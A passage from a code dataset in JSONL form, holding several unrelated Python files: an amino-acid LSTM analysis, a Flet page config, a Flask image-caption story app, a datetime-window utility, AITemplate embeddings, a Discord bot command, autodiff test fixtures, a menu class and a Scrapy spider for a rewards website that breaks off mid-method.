model(one_hot)\n pred = pred[-1]\n pred = nn.functional.softmax(pred)\n second_prob = pred[j]\n\n # third input, create a vector of the first and second indices, ex. 
(A, A, [end])\n # to get the probability for index k\n one_hot = torch.zeros([1, 100, 20]).to(device)\n one_hot[0][98][j] += 1\n one_hot[0][97][i] += 1\n\n pred = model(one_hot)\n pred = pred[-1]\n pred = nn.functional.softmax(pred)\n third_prob = pred[k]\n\n model_probs[i][j][k] = first_prob * second_prob * third_prob\n\nmodel_probs = torch.flatten(model_probs)\n\nplt.plot(model_probs)\nplt.show()\n\nsequence_count = torch.Tensor(sequence_count)\ndistance = torch.linalg.norm(sequence_count - model_probs)\n\nprint(\"Distance: {}\".format(distance))\n\ndifference = torch.abs(sequence_count - model_probs)\ndifference = torch.sort(difference)\n\nfurthest_elements = difference[0][-20:].numpy()\nfurthest_elements_index = difference[1][-20:].numpy()\n\nprint('furthest probs: {}'.format(furthest_elements))\n\nclosest_elements = difference[0][:20].numpy()\nclosest_elements_index = difference[1][:20].numpy()\n\nprint(\"closest probs: {}\".format(closest_elements))\n\namino_acids = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L',\n 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']\nencodings = np.eye(len(amino_acids))\n\namino_acid_encodings = {}\nfor i, amino_acid in enumerate(amino_acids):\n amino_acid_encodings[i] = amino_acid\n\nfurthest_sequences = []\nfor index in furthest_elements_index:\n amino_acid = ''\n cur_index = np.unravel_index(index, (20, 20, 20))\n amino_acid += amino_acid_encodings[cur_index[0]]\n amino_acid += amino_acid_encodings[cur_index[1]]\n amino_acid += amino_acid_encodings[cur_index[2]]\n furthest_sequences.append(amino_acid)\n\nclosest_sequences = []\nfor index in closest_elements_index:\n amino_acid = ''\n cur_index = np.unravel_index(index, (20, 20, 20))\n amino_acid += amino_acid_encodings[cur_index[0]]\n amino_acid += amino_acid_encodings[cur_index[1]]\n amino_acid += amino_acid_encodings[cur_index[2]]\n closest_sequences.append(amino_acid)\n\nprint('furthest: {}'.format(furthest_sequences))\nprint('closest: {}'.format(closest_sequences))","repo_name":"JohnLazzari/LSTM-Amino-Acids","sub_path":"3_gram.py","file_name":"3_gram.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19103996612","text":"import flet as ft\nfrom flet import UserControl, Theme, Page\nimport assets.colors\nimport assets.fonts.config\n\n\nclass PageConfig:\n \"\"\"\n Configura as propriedades da página.\n \"\"\"\n\n def __init__(self, page: Page):\n self.page = page\n\n # Define o título da página\n self.page.title = \"Estacao Meteorologica\"\n\n # Define a largura e altura da janela\n self.page.window_width = 385.0\n self.page.window_height = 704.0\n\n # Habilita a barra de rolagem da página\n self.page.scroll = \"auto\"\n # Define que a janela deve ficar sempre no topo\n self.page.window_always_on_top = True\n # Define a posição horizontal do conteúdo na janela\n self.page.horizontal_alignment = ft.CrossAxisAlignment.CENTER\n\n # Define o modo e o tema da página\n self.page.theme_mode = \"light\"\n self.page.theme = ft.theme.Theme(\n color_scheme_seed=assets.colors.BACKGROUND2, use_material3=True\n )\n # Atualiza a página\n self.page.fonts = assets.fonts.config.load()\n self.page.update()\n","repo_name":"maiconrp/estacao-meteorologica","sub_path":"code/app/config/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"pt","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"42507779397","text":"import imghdr\r\nimport 
os\r\nimport glob\r\nfrom flask import Flask, render_template, request, redirect, url_for, abort, \\\r\n send_from_directory, jsonify\r\nfrom werkzeug.utils import secure_filename\r\nimport uuid\r\n# from waitress import serve\r\n\r\n# Image Caption module\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom img2_caption import load_models, predict\r\nfrom PIL import Image\r\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\r\n\r\n# GPT3 Module\r\nfrom gpt3 import generate_story, create_paragraphing_html, gpt3_init\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['MAX_CONTENT_LENGTH'] = 2 * 1024 * 1024\r\napp.config['UPLOAD_EXTENSIONS'] = ['.jpg', '.png', '.jpeg']\r\napp.config['UPLOAD_PATH'] = 'static/uploads/'\r\napp.config['PLOT_PATH'] = 'static/plot/'\r\n\r\n# Load img_caption model\r\nimage_features_extract_model, tokenizer, encoder, decoder = load_models()\r\nresult_list = [] # init empty result list\r\nlast_story = \"\"\r\n\r\n# Load GPT3 model\r\ngpt3_init()\r\n\r\n\r\ndef plot_attention(image, result, attention_plot):\r\n temp_image = np.array(Image.open(image))\r\n\r\n fig = plt.figure(figsize=(10, 10))\r\n\r\n # https://stackoverflow.com/questions/12319796/dynamically-add-create-subplots-in-matplotlib\r\n Tot = len(result)\r\n Cols = 3\r\n\r\n # Compute Rows required\r\n Rows = Tot // Cols\r\n Rows += Tot % Cols\r\n\r\n # Create a Position index\r\n Position = range(1, Tot + 1)\r\n\r\n for l in range(Tot):\r\n temp_att = np.resize(attention_plot[l], (8, 8))\r\n ax = fig.add_subplot(Rows, Cols, Position[l])\r\n ax.set_title(result[l], fontsize=30)\r\n img = ax.imshow(temp_image)\r\n ax.imshow(temp_att, cmap='gray', alpha=0.6, extent=img.get_extent())\r\n\r\n plt.tight_layout()\r\n return fig\r\n\r\n\r\ndef validate_image(stream):\r\n\r\n header = stream.read(512)\r\n stream.seek(0)\r\n format = imghdr.what(None, header)\r\n if not format:\r\n return None\r\n return '.' 
+ (format if format != 'jpeg' else 'jpg')\r\n\r\n\r\ndef del_dir_files(files_path):\r\n\r\n existing_files = os.path.join(files_path, '*')\r\n file_to_delete = glob.glob(existing_files)\r\n for i in file_to_delete:\r\n os.remove(i)\r\n\r\n\r\n@app.errorhandler(413)\r\ndef too_large(e):\r\n \r\n return \"File is too large\", 413\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n\r\n result_list[:] = [] # clear result list\r\n\r\n # Cleanup all the image files in static/uploads.\r\n del_dir_files(app.config['UPLOAD_PATH'])\r\n del_dir_files(app.config['PLOT_PATH'])\r\n \r\n\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef upload_files():\r\n \r\n uploaded_file = request.files['file']\r\n filename = secure_filename(uploaded_file.filename)\r\n if filename != '':\r\n file_ext = os.path.splitext(filename)[1]\r\n if file_ext not in app.config['UPLOAD_EXTENSIONS'] or \\\r\n file_ext != validate_image(uploaded_file.stream):\r\n return \"Invalid image\", 400\r\n uploaded_file.save(os.path.join(app.config['UPLOAD_PATH'], filename))\r\n\r\n return '', 204\r\n\r\n\r\n@app.route('/image_caption', methods=[\"GET\", \"POST\"])\r\ndef image_caption():\r\n \r\n image_names = os.listdir(app.config['UPLOAD_PATH'])\r\n\r\n caption_image_list = []\r\n plot_image_name = []\r\n\r\n for i in image_names:\r\n result, attention_plot = predict(os.path.join(\r\n app.config['UPLOAD_PATH'], i), image_features_extract_model,\r\n tokenizer, encoder, decoder)\r\n\r\n # generate random filename\r\n filename = str(uuid.uuid4())\r\n\r\n fig = plot_attention(os.path.join(\r\n app.config['UPLOAD_PATH'], i), result, attention_plot)\r\n fig.savefig(app.config['PLOT_PATH'] + filename + '.png', bbox_inches='tight',\r\n pad_inches=0)\r\n\r\n plot_image_name.append(filename + '.png')\r\n del result[-1] # remove the last element \"<end>\"\r\n result_list.append(result)\r\n caption = ' '.join(result).capitalize()\r\n caption_image_list.append(caption)\r\n\r\n return jsonify(caption_image_list=caption_image_list, image_names=image_names,\r\n plot_image_name=plot_image_name)\r\n\r\n\r\n@app.route('/display_image', methods=[\"GET\", \"POST\"])\r\ndef display_image():\r\n \r\n image_names = os.listdir(app.config['UPLOAD_PATH'])\r\n\r\n caption_list = []\r\n text_list = [\"\"]\r\n last_story = \"\"\r\n\r\n j = 0\r\n\r\n for i in image_names:\r\n \r\n\r\n result = result_list[j]\r\n caption_title = f\"'{' '.join(result[:]).capitalize()}'\"\r\n caption = ' '.join(result)\r\n # caption = text_list[-1] + \"\\nprompt: \" + caption + \"\\nstory:\\n \"\r\n # caption = last_story + \" \" + caption\r\n generate_txt = generate_story(caption, model)\r\n generate_txt = create_paragraphing_html(generate_txt)\r\n caption_list.append(caption_title)\r\n text_list.append(generate_txt)\r\n last_story = generate_txt[-50:]\r\n \r\n\r\n j += 1\r\n text_list = text_list[1:]\r\n\r\n return jsonify(caption_list=caption_list, image_names=image_names,\r\n text_list=text_list)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, port=8000)\r\n \r\n","repo_name":"suvivarshney/SnapStory-An-image-to-text-story-generator-using-GPT3","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"16353415122","text":"from typing import Union\nfrom datetime import datetime, timedelta\n\nfrom dateutil.relativedelta import relativedelta\nimport pytz\n\n\nclass DatetimeWindow:\n '''\n Make a 
window between two datetimes, and easily create new windows using\n the first window as a reference point.\n '''\n default_timezone = pytz.UTC\n\n def __init__(\n self, date1: Union[datetime, relativedelta], date2: datetime=None\n ) -> None:\n date2 = self.now_if_none(date2)\n\n if isinstance(date1, relativedelta):\n date1 = date2 + date1\n\n date1 = self.ensure_timezone(date1)\n date2 = self.ensure_timezone(date2)\n\n self.start = min([date1, date2])\n self.end = max([date1, date2])\n\n self.duration = relativedelta(self.end, self.start)\n\n def __repr__(self) -> str:\n return '{}({}, {})'.format(\n self.__class__.__name__,\n repr(self.start),\n repr(self.end)\n )\n\n def __str__(self) -> str:\n return str({\n 'start': self.start,\n 'end': self.end,\n 'duration': self.duration,\n })\n\n @staticmethod\n def now_if_none(dt: Union[None, datetime]\n ) -> Union[datetime, relativedelta]:\n if dt is None:\n return datetime.now(DatetimeWindow.default_timezone)\n else:\n return dt\n\n @staticmethod\n def ensure_timezone(dt: datetime=None, tzinfo: 'pytz'=None) -> datetime:\n if tzinfo is None:\n tzinfo = DatetimeWindow.default_timezone\n\n dt = DatetimeWindow.now_if_none(dt)\n if dt.tzinfo is None:\n dt = dt.replace(tzinfo=tzinfo)\n return dt\n\n @staticmethod\n def create_explicit(\n start: datetime=None, end: datetime=None\n ) -> 'DatetimeWindow':\n start = DatetimeWindow.now_if_none(start)\n end = DatetimeWindow.now_if_none(end)\n\n if start > end:\n raise ValueError(('Cannot have a start after the end'\n '({},{})').format(start, end))\n return DatetimeWindow(start, end)\n\n def start_add(self, **relativedelta_kwargs) -> 'DatetimeWindow':\n '''\n Add a relativedelta to the start of the DatetimeWindow. Uses the\n relativedelta args, e.g. dtw.start_add(days=1)\n Can be negative, e.g. dtw.start_add(days=-1)\n '''\n return self.create_explicit(\n start=self.start + relativedelta(**relativedelta_kwargs),\n end=self.end,\n )\n\n def end_add(self, **relativedelta_kwargs) -> 'DatetimeWindow':\n '''\n Add a relativedelta to the end of the DatetimeWindow. Uses the\n relativedelta args, e.g. dtw.end_add(days=1)\n Can be negative, e.g. dtw.end_add(days=-1)\n '''\n return self.create_explicit(\n start=self.start,\n end=self.end + relativedelta(**relativedelta_kwargs),\n )\n\n def window_add(self, **relativedelta_kwargs) -> 'DatetimeWindow':\n '''\n Add a relativedelta to both the start and end of the DatetimeWindow.\n Uses the relativedelta args, e.g. dtw.window_add(days=1)\n Can be negative, e.g. dtw.window_add(days=-1)\n '''\n return self.create_explicit(\n start=self.start + relativedelta(**relativedelta_kwargs),\n end=self.end + relativedelta(**relativedelta_kwargs),\n )\n\n def window_expand(self, **relativedelta_kwargs) -> 'DatetimeWindow':\n '''\n Symmetrically expand the DatetimeWindow by relativedelta at both the\n start and the end.\n Uses the relativedelta args, e.g. dtw.window_expand(days=1)\n Can be negative, e.g. dtw.window_expand(days=-1)\n '''\n return self.create_explicit(\n start=self.start - relativedelta(**relativedelta_kwargs),\n end=self.end + relativedelta(**relativedelta_kwargs),\n )\n\n def duration_days(self) -> float:\n '''\n Calculates the duration of the DatetimeWindow using only `days` as the\n unit, to one-second precision. 
`days` is a special case, because\n `dateutil.relativedelta` rounds `days` to `months`, and there's no\n consistent number of `days` in a `month` (or a `year`).\n '''\n return ((self.end - self.start).total_seconds()\n / timedelta(days=1).total_seconds())\n\n '''\n Comparisons\n '''\n @staticmethod\n def is_positive_relativedelta(rd: relativedelta) -> bool:\n '''\n Can't compare relativedeltas directly, so as a hack, add it to a\n datetime and compare those.\n '''\n now = datetime.now()\n now_delta = now + rd\n return now_delta >= now\n\n def starts_after(self, dt: datetime) -> bool:\n '''\n Does the DatetimeWindow start after the specified datetime?\n '''\n if not isinstance(dt, datetime):\n raise ValueError('Must compare a datetime to the DatetimeWindow')\n return dt < self.start\n\n def contains(self, dt: Union[datetime, 'DatetimeWindow']) -> bool:\n '''\n Does the DatetimeWindow contain the\n specified datetime or DatetimeWindow?\n '''\n if isinstance(dt, datetime):\n dtw = DatetimeWindow(dt, dt)\n elif isinstance(dt, DatetimeWindow):\n dtw = dt\n else:\n raise TypeError('Must compare a datetime or DatetimeWindow')\n return dtw.start >= self.start and dtw.end <= self.end\n\n def ends_after(self, dt: datetime) -> bool:\n '''\n Does the DatetimeWindow end after the specified datetime?\n '''\n if not isinstance(dt, datetime):\n raise ValueError('Must compare a datetime to the DatetimeWindow')\n return dt < self.end\n\n def overlaps(self, dtw: 'DatetimeWindow') -> Union['DatetimeWindow', None]:\n '''\n Provide a new DatetimeWindow of the overlap, or None if the\n DatetimeWindows don't overlap.\n '''\n if not isinstance(dtw, DatetimeWindow):\n raise TypeError('Must compare a DatetimeWindow')\n\n w_overall = DatetimeWindow(\n min([dtw.start, self.start]), max([dtw.end, self.end]))\n w_end_to_end = DatetimeWindow(\n min([dtw.end, self.end]), max([dtw.end, self.end]))\n w_start_to_start = DatetimeWindow(\n min([dtw.start, self.start]), max([dtw.start, self.start]))\n overlap_duration = (\n w_overall.duration - w_end_to_end.duration\n - w_start_to_start.duration\n )\n\n if not self.is_positive_relativedelta(overlap_duration):\n return None\n else:\n return DatetimeWindow(w_start_to_start.end, w_end_to_end.start)\n","repo_name":"jbryanscott/datetimewindow","sub_path":"datetimewindow/datetimewindow.py","file_name":"datetimewindow.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19816704040","text":"import math\n\nfrom aitemplate.compiler import ops\nfrom aitemplate.frontend import nn, Tensor\n\n\ndef get_shape(x):\n shape = [it.value() for it in x._attrs[\"shape\"]]\n return shape\n\n\ndef get_timestep_embedding(\n timesteps: Tensor,\n embedding_dim: int,\n flip_sin_to_cos: bool = False,\n downscale_freq_shift: float = 1,\n scale: float = 1,\n max_period: int = 10000,\n):\n \"\"\"\n This matches the implementation in Denoising Diffusion Probabilistic Models: Create sinusoidal timestep embeddings.\n\n :param timesteps: a 1-D Tensor of N indices, one per batch element.\n These may be fractional.\n :param embedding_dim: the dimension of the output. :param max_period: controls the minimum frequency of the\n embeddings. 
:return: an [N x dim] Tensor of positional embeddings.\n \"\"\"\n assert timesteps._rank() == 1, \"Timesteps should be a 1d-array\"\n\n half_dim = embedding_dim // 2\n\n exponent = (-math.log(max_period)) * Tensor(\n shape=[half_dim], dtype=\"float16\", name=\"arange\"\n )\n\n exponent = exponent * (1.0 / (half_dim - downscale_freq_shift))\n\n emb = ops.exp(exponent)\n emb = ops.reshape()(timesteps, [-1, 1]) * ops.reshape()(emb, [1, -1])\n\n # scale embeddings\n emb = scale * emb\n\n # concat sine and cosine embeddings\n if flip_sin_to_cos:\n emb = ops.concatenate()(\n [ops.cos(emb), ops.sin(emb)],\n dim=-1,\n )\n else:\n emb = ops.concatenate()(\n [ops.sin(emb), ops.cos(emb)],\n dim=-1,\n )\n return emb\n\n\nclass TimestepEmbedding(nn.Module):\n def __init__(self, channel: int, time_embed_dim: int, act_fn: str = \"silu\"):\n super().__init__()\n\n self.linear_1 = nn.Linear(channel, time_embed_dim, specialization=\"swish\")\n self.linear_2 = nn.Linear(time_embed_dim, time_embed_dim)\n\n def forward(self, sample):\n sample = self.linear_1(sample)\n sample = self.linear_2(sample)\n return sample\n\n\nclass Timesteps(nn.Module):\n def __init__(\n self, num_channels: int, flip_sin_to_cos: bool, downscale_freq_shift: float\n ):\n super().__init__()\n self.num_channels = num_channels\n self.flip_sin_to_cos = flip_sin_to_cos\n self.downscale_freq_shift = downscale_freq_shift\n\n def forward(self, timesteps):\n t_emb = get_timestep_embedding(\n timesteps,\n self.num_channels,\n flip_sin_to_cos=self.flip_sin_to_cos,\n downscale_freq_shift=self.downscale_freq_shift,\n )\n return t_emb\n","repo_name":"facebookincubator/AITemplate","sub_path":"examples/05_stable_diffusion/src/modeling/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"19765064111","text":"import discord\n\nimport chattrigger\nfrom persistentstorage.persstorage import PersistentStorage\n\n\nclass AddSlowMode(chattrigger.ChatTrigger):\n\n async def run(self, message: discord.Message, trigger: str, client: discord.Client):\n # tag Time\n\n if not message.author.guild_permissions.administrator:\n await message.channel.send(\n \"You do not have the permissions to execute this command. The administrator permission is required.\")\n return\n\n args = message.content.split(\" \")\n\n if not len(args) == 3:\n await message.channel.send(\"Invalid Syntax! 
The proper syntax is ,asm [@user] [Slow mode seconds]!\")\n return\n\n target_user = message.mentions[0]\n\n per_storage = PersistentStorage(client)\n\n await per_storage.append_data(message.guild.id, \"slowmodelist\", f\".{str(target_user.id)},{args[2]}\")\n await message.channel.send(\"Done.\")\n","repo_name":"98ht24/replywithdotrecodedrecoded","sub_path":"chattriggers/addslowmode.py","file_name":"addslowmode.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11175149088","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pytest\nimport collections\nfrom tests.common import arepeat, arange, amap\n\nimport tests.autodiff.fakes as fake\n\nimport tadpole.util as util\nimport tadpole.autodiff.types as at\nimport tadpole.autodiff.nary as nary\n\n\n\n\n###############################################################################\n### ###\n### Nary operator: decorator that converts unary operators into nary ones ###\n### ###\n###############################################################################\n\n\n# --- Nary operator --------------------------------------------------------- #\n\nNaryOpData = collections.namedtuple(\"NaryOpData\", [\n \"nary_op\", \"unary_op\", \"fun\", \"argproxy\", \"adx\", \n \"args\", \"args1\", \"x\", \"x1\", \"out\"\n ]) \n\n\n\n\ndef nary_op_dat(args, adx):\n\n x = args[adx]\n x1 = fake.Node()\n out = fake.Node()\n\n args1 = list(args)\n args1[adx] = x1\n\n unary_op = fake.Op(fake.Fun(x1, x))\n fun = fake.Fun(out, *args1)\n argproxy = fake.ArgProxy(\n insert=fake.Fun(args1, args, x1), \n extract=fake.Fun(x, args)\n ) \n nary_op = nary.NaryOp(unary_op, fun, argproxy)\n\n return NaryOpData(nary_op, unary_op, fun, argproxy, adx, \n args, args1, x, x1, out)\n\n\n\n\n# --- Nary operator creation ------------------------------------------------ #\n\nNaryOpCreatorData = collections.namedtuple(\"NaryOpCreatorData\", [\n \"nary_op\", \"unary_op\", \"fun\", \"argproxy\", \"adx\", \n ]) \n\n\n\ndef nary_op_creator_dat(adx, proxytype):\n\n argproxy = {\n \"SINGULAR\": nary.ArgProxySingular,\n \"PLURAL\": nary.ArgProxyPlural,\n }[proxytype](adx) \n\n def fun(*args): \n return fake.Value()\n\n def unary_op(fun, x):\n return fake.Value()\n\n nary_op = nary.NaryOp(unary_op, fun, argproxy) \n\n return NaryOpCreatorData(nary_op, unary_op, fun, argproxy, adx)\n\n\n\n\n# --- Argument proxy -------------------------------------------------------- #\n\nArgProxyData = collections.namedtuple(\"ArgProxyData\", [\n \"argproxy\", \"adx\", \"x\", \"args\", \"args1\",\n ]) \n\n\n\n\ndef singular_argproxy_dat(adx):\n\n x = fake.Value()\n args = arepeat(fake.Value, 4)\n args1 = {\n 0: lambda: (x, args[1], args[2], args[3]),\n 1: lambda: (args[0], x, args[2], args[3]),\n 2: lambda: (args[0], args[1], x, args[3]),\n 3: lambda: (args[0], args[1], args[2], x),\n }[adx]()\n\n argproxy = nary.ArgProxySingular(adx)\n\n return ArgProxyData(argproxy, adx, x, args, args1)\n\n\n\n\ndef plural_argproxy_dat(adx):\n\n x = arepeat(fake.Value, len(adx))\n args = arepeat(fake.Value, 4)\n args1 = {\n (1,): lambda: (args[0], x[0], args[2], args[3]),\n (0,1): lambda: (x[0], x[1], args[2], args[3]),\n (1,3): lambda: (args[0], x[0], args[2], x[1]),\n (0,2,3): lambda: (x[0], args[1], x[1], x[2]),\n (0,3): lambda: (x[0], args[1], args[2], x[1]),\n }[adx]()\n\n argproxy = nary.ArgProxyPlural(adx)\n\n return ArgProxyData(argproxy, adx, x, args, args1)\n\n\n \n\ndef singular_argproxy_dat_001():\n\n 
adx = 0\n\n x = fake.Value()\n args = tuple()\n args1 = (x,)\n\n argproxy = nary.ArgProxySingular(adx)\n\n return ArgProxyData(argproxy, adx, x, args, args1)\n\n\n\n\ndef plural_argproxy_dat_001():\n\n adx = (0,1)\n\n x = arepeat(fake.Value, len(adx))\n args = tuple()\n args1 = tuple(x)\n\n argproxy = nary.ArgProxyPlural(adx)\n\n return ArgProxyData(argproxy, adx, x, args, args1) \n\n\n\n\n\n\n","repo_name":"dkilda/tadpole","sub_path":"tests/autodiff/data/nary.py","file_name":"nary.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28705507865","text":"from item import Item\nfrom drink import Drink\nfrom food import Food\n\n\nclass Menu:\n def __init__(self, restaurant_name, address, drinks=None, foods=None):\n self.restaurant_name = restaurant_name\n self.address = address\n self.drinks = drinks if drinks else []\n self.foods = foods if foods else []\n\n def __str__(self):\n return f'{self.restaurant_name}\\n{self.address}\\n\\nНапитки:\\n{self._print_items(self.drinks)}\\n\\nБлюда:\\n{self._print_items(self.foods)}'\n\n def __len__(self):\n return len(self.drinks) + len(self.foods)\n\n def __getitem__(self, index):\n if index < len(self.drinks):\n return self.drinks[index]\n else:\n return self.foods[index - len(self.drinks)]\n\n def __setitem__(self, index, item):\n if index < len(self.drinks):\n self.drinks[index] = item\n else:\n self.foods[index - len(self.drinks)] = item\n\n def __delitem__(self, index):\n if index < len(self.drinks):\n del self.drinks[index]\n else:\n del self.foods[index - len(self.drinks)]\n\n def __add__(self, other):\n if isinstance(other, Drink):\n self.drinks.append(other)\n elif isinstance(other, Food):\n self.foods.append(other)\n else:\n raise TypeError(\"В меню можно добавить лишь напитки либо блюда\")\n\n return self\n\n def __sub__(self, other):\n if isinstance(other, Drink):\n self.drinks.remove(other)\n elif isinstance(other, Food):\n self.foods.remove(other)\n else:\n raise TypeError(\"В меню можно добавить лишь напитки либо блюда\")\n\n return self\n\n def create_txt_file(self, file_path):\n with open(file_path, 'w') as f:\n f.write(str(self))\n for drink in self.drinks:\n f.write('\\n\\n' + str(drink))\n for food in self.foods:\n f.write('\\n\\n' + str(food))\n\n def _print_items(self, items):\n return '\\n'.join([str(item) for item in items])\n","repo_name":"gr1fxn/MIREA","sub_path":"1 курс/2 семестр/Ознакомительная практика/Тема C/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40225734080","text":"import scrapy\nimport datetime\nimport re\nimport posixpath\nfrom pst_ag_project.items import PostDetails\nfrom twisted.internet.error import DNSLookupError\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom twisted.internet.error import TimeoutError, TCPTimedOutError\nfrom scrapy.crawler import CrawlerProcess\n\nscraped_post_list = []\n\n\nclass RwjstspiderSpider(scrapy.Spider):\n name = \"rwjstspider\"\n allowed_domains = [\"rewardsforjustice.net\"]\n start_urls = [\"http://rewardsforjustice.net/\"]\n\n payload = \"action=jet_engine_ajax&handler=get_listing&page_settings%\"\\\n \"5Bpost_id%5D=22076&page_settings%5Bqueried_id%5D=22076%7CWP_Post&page_\"\\\n \"settings%5Belement_id%5D=ddd7ae9&page_settings%5Bpage%5D=1&listing_type=ele\"\\\n \"mentor&isEditMode=false&addedPostCSS%5B%5D=22078\"\n\n headers 
= {\n \"authority\": \"rewardsforjustice.net\",\n \"accept\": \"application/json, text/javascript, */*; q=0.01\",\n \"accept-language\": \"en-US,en;q=0.9,my-ZG;q=0.8,my;q=0.7\",\n \"cache-control\": \"no-cache\",\n \"content-type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"cookie\": \"_ga=GA1.1.2132662955.1681741987; cookie_notice_accepted=true; wp-wpml_current_language=en; _ga_BPR2J8V0QK=GS1.1.1681801651.5.1.1681802357.0.0.0\",\n \"origin\": \"https://rewardsforjustice.net\",\n \"pragma\": \"no-cache\",\n \"referer\": \"https://rewardsforjustice.net/index/?jsf=jet-engine:rewards-grid&tax=crime-category:1070%2C1071%2C1073%2C1072%2C1074\",\n \"sec-ch-ua\": '\"Chromium\";v=\"112\", \"Google Chrome\";v=\"112\", \"Not:A-Brand\";v=\"99\"',\n \"sec-ch-ua-mobile\": \"?0\",\n \"sec-ch-ua-platform\": '\"macOS\"',\n \"sec-fetch-dest\": \"empty\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-site\": \"same-origin\",\n \"user-agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\",\n \"x-requested-with\": \"XMLHttpRequest\",\n }\n\n url = \"https://rewardsforjustice.net/index/?jsf=jet-engine%3Arewards-grid&tax=crime-category%3A1070%2C1071%2C1073%2C1072%2C1074\"\n\n def parse(self, response):\n request = scrapy.Request(\n url=self.url,\n callback=self.parse_api,\n headers=self.headers,\n body=self.payload,\n method=\"POST\",\n errback=self.errback_httpbin,\n )\n\n yield request\n\n def parse_api(self, response):\n \"\"\"To make request and get individual urls for each post\n\n Args:\n response (response_object): scrapy response object\n\n Yields:\n response object: A json response containing all links for a particular page\n \"\"\"\n base_url = self.url\n json_response = response.json()\n total_num_of_pages = json_response[\"data\"][\"filters_data\"][\"props\"][\n \"rewards-grid\"\n ][\"max_num_pages\"]\n\n for page_number in range(1, total_num_of_pages + 1):\n path = f\"&pagenum={page_number}\"\n url = posixpath.join(base_url, path)\n\n yield scrapy.Request(\n url=url,\n callback=self.parse_links,\n headers=self.headers,\n body=self.payload,\n method=\"POST\",\n errback=self.errback_httpbin,\n )\n\n def parse_links(self, response):\n \"\"\"To make request to each post url and get page element\n\n Args:\n response (response_object): scrapy response object\n\n Yields:\n response object: A response containing page elements\n \"\"\"\n json_response = response.json()\n string = json_response[\"data\"][\"html\"]\n pattern = 'data-url=\"https://rewardsforjustice.net/rewards/.*/'\n all_links = re.findall(pattern, string)\n clean_links = list(map(lambda x: x.split('=\"')[1], all_links))\n\n for post_link in clean_links[0:2]:\n yield scrapy.Request(url=post_link, callback=self.parse_post)\n\n def parse_post(self, response):\n \"\"\"To get datapoints from page element\n\n Args:\n response (response_object): scrapy response object\n\n Yields:\n post_details: A dictionary of scraped post details\n \"\"\"\n post_details = PostDetails()\n try:\n image_div_class = response.xpath(\n \"//h2[text()='Images:']//parent::div//parent::\"\\\n \"div//following-sibling::div[starts-with(@class, 'elementor-element')]\"\n ).attrib[\"class\"]\n image_divs = response.xpath(\n f\"//div[contains(@class, '{image_div_class}')]//figure\"\n )\n image_urls = [element.css(\"img\").attrib[\"src\"] for element in image_divs]\n except KeyError:\n image_urls = None\n\n try:\n dob_class = response.xpath(\n \"//h2[text()='Date of 
Birth:']//parent::div//parent::\"\\\n \"div//following-sibling::div[starts-with(@class, 'elementor-element')]\"\n ).attrib[\"class\"]\n dob = response.xpath(\n f\"//div[contains(@class, '{dob_class}')]/div/text()\"\n ).get()\n except KeyError:\n dob = None\n\n try:\n ass_loc_class = response.xpath(\n \"//h2[contains(text(),'Associated Location')]//parent::\"\\\n \"div//parent::div//following-sibling::div[starts-with(@class, 'elementor-element')]\"\n ).attrib[\"class\"]\n ass_loc = response.xpath(\n f\"//div[contains(@class, '{ass_loc_class}')]//div//div/span/text()\"\n ).getall()\n except KeyError:\n ass_loc = None\n\n try:\n ass_org_class = response.xpath(\n \"//h2[contains(text(),'Associated Organization')]//parent::\"\\\n \"div//parent::div//following-sibling::div[starts-with(@class, 'elementor-element')]\"\n ).attrib[\"class\"]\n ass_org = response.xpath(\n f\"//div[contains(@class, '{ass_org_class}')]//div/text()\"\n ).get()\n except KeyError:\n try:\n ass_org_class = response.xpath(\n \"//p[contains(text(),'Associated Organization')]\"\n )\n ass_org = ass_org_class.css(\"a::text\").get()\n except Exception:\n ass_org = None\n\n post_details[\"url\"] = response.url\n post_details[\"category\"] = response.css(\n \"span.jet-listing-dynamic-terms__link::text\"\n ).get()\n post_details[\"title\"] = response.css(\"h2::text\").get()\n post_details[\"reward_amount\"] = response.xpath(\n '//h2[contains(text(), \"Up to\")]/text()'\n ).get()\n post_details[\"associated_organization\"] = ass_org\n post_details[\"associated_location\"] = ass_loc\n post_details[\"about\"] = response.xpath(\n \"//div[@data-widget_type='theme-post-content.default']//child::div//p/text()\"\n ).getall()\n post_details[\"image_urls\"] = image_urls\n post_details[\"date_of_birth\"] = dob\n\n scraped_post_list.append(post_details)\n yield post_details\n\n def errback_httpbin(self, failure):\n \"\"\"To log API 